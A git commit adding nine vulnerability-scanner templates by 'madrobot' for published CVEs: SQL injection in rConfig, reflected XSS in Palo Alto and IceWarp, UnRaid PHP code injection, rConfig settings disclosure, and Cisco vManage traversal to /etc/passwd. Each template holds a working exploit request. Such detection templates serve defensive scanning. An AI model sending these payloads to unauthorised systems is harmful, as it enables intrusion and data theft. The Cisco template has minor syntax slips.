commit
a3dbe4f2f9
|
@ -0,0 +1,21 @@
|
||||||
|
id: CVE-2020-10546
|
||||||
|
info:
|
||||||
|
name: rConfig 3.9.4 SQLi
|
||||||
|
author: madrobot
|
||||||
|
severity: high
|
||||||
|
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10546
|
||||||
|
tags: SQLI
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+"
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "[project-discovery]"
|
||||||
|
part: body
|
|
@ -0,0 +1,21 @@
|
||||||
|
id: CVE-2020-10547
|
||||||
|
info:
|
||||||
|
name: rConfig 3.9.4 SQLi
|
||||||
|
author: madrobot
|
||||||
|
severity: high
|
||||||
|
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10547
|
||||||
|
tags: SQLI
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains"
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "[project-discovery]"
|
||||||
|
part: body
|
|
@ -0,0 +1,21 @@
|
||||||
|
id: CVE-2020-10548
|
||||||
|
info:
|
||||||
|
name: rConfig 3.9.4 SQLi
|
||||||
|
author: madrobot
|
||||||
|
severity: high
|
||||||
|
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10548
|
||||||
|
tags: SQLI
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains"
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "[project-discovery]"
|
||||||
|
part: body
|
|
@ -0,0 +1,21 @@
|
||||||
|
id: CVE-2020-10549
|
||||||
|
info:
|
||||||
|
name: rConfig 3.9.4 SQLi
|
||||||
|
author: madrobot
|
||||||
|
severity: high
|
||||||
|
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10549
|
||||||
|
tags: SQLI
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/snippets.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchColumn=snippetName&searchOption=contains"
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "[project-discovery]"
|
||||||
|
part: body
|
|
@ -0,0 +1,21 @@
|
||||||
|
id: CVE-2020-2036
|
||||||
|
info:
|
||||||
|
name: Palo Alto Networks Reflected Cross Site Scripting
|
||||||
|
author: madrobot
|
||||||
|
severity: medium
|
||||||
|
reference: https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/
|
||||||
|
tags: XSS
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E"
|
||||||
|
- "{{BaseURL}}/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E"
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<svg/onload=alert(1)>"
|
||||||
|
part: body
|
|
@ -0,0 +1,21 @@
|
||||||
|
id: CVE-2020-27982
|
||||||
|
info:
|
||||||
|
name: IceWarp WebMail Reflected XSS
|
||||||
|
author: madrobot
|
||||||
|
severity: medium
|
||||||
|
reference: https://packetstormsecurity.com/files/159763/Icewarp-WebMail-11.4.5.0-Cross-Site-Scripting.html
|
||||||
|
tags: XSS
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E"
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<img src=x onerror=alert(1)>"
|
||||||
|
part: body
|
|
@ -0,0 +1,21 @@
|
||||||
|
id: CVE-2020-5847
|
||||||
|
info:
|
||||||
|
name: UnRaid Remote Code Execution
|
||||||
|
author: madrobot
|
||||||
|
severity: high
|
||||||
|
reference: https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/
|
||||||
|
tags: Directory Traversal
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20phpinfo();%20?%3E"
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "http://www.php.net/"
|
||||||
|
part: body
|
|
@ -0,0 +1,22 @@
|
||||||
|
id: CVE-2020-9425
|
||||||
|
info:
|
||||||
|
name: rConfig Unauthenticated Sensitive Information Disclosure
|
||||||
|
author: madrobot
|
||||||
|
severity: high
|
||||||
|
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9425
|
||||||
|
tags: Information Disclosure
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/settings.php"
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "defaultNodeUsername"
|
||||||
|
- "defaultNodePassword"
|
||||||
|
part: body
|
|
@ -0,0 +1,21 @@
|
||||||
|
id: CVE-2020–26073
|
||||||
|
info:
|
||||||
|
name: Cisco SD-WAN vManage Software Directory Traversal
|
||||||
|
author: madrobot
|
||||||
|
severity: high
|
||||||
|
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020–26073
|
||||||
|
tags: Directory Traversal
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd"
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
- type: regex
|
||||||
|
words:
|
||||||
|
- "root:[x*]:0:0:"
|
||||||
|
part: body
|
Loading…
Reference in New Issue